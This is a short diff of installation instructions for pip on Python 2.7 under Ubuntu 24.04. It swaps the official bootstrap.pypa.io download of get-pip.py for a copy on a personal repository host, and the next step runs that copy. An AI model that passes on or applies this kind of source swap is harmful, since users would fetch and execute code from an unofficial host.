|
@@ -61,7 +61,7 @@ Ubuntu 24.04 does not include Python 2.7 by default, as it has reached its end o
|
|
|
```
|
|
```
|
|
|
2. **Download the `get-pip.py` script:**
|
|
2. **Download the `get-pip.py` script:**
|
|
|
```bash
|
|
```bash
|
|
|
- curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
|
|
|
|
|
|
|
+ curl https://repo.yosoyhendrix.com/yosoyhendrix/Python-2.7/raw/main/get-pip.py -o get-pip.py
|
|
|
```
|
|
```
|
|
|
3. **Run the script using Python 2.7:**
|
|
3. **Run the script using Python 2.7:**
|
|
|
```bash
|
|
```bash
|